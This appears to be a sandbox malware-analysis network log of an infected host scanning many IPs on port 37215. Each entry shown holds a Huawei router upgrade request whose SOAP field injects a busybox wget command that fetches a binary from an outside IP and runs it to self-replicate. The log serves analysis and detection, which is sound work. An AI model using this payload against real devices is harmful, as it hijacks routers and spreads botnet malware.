2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2460192.168.2.1348750157.11.182.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807215929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2461192.168.2.1354798197.242.153.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807235003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2462192.168.2.1351074157.240.222.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807250023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2463192.168.2.1349426157.123.164.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807271957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2464192.168.2.1339814157.225.53.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807352066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2465192.168.2.136084441.149.247.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807405949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2466192.168.2.1340990157.211.124.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807408094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2467192.168.2.134509641.175.119.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807425022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2468192.168.2.133592250.4.188.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807445049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2469192.168.2.1356410157.193.226.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807459116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2470192.168.2.1337510197.55.82.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.807477951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
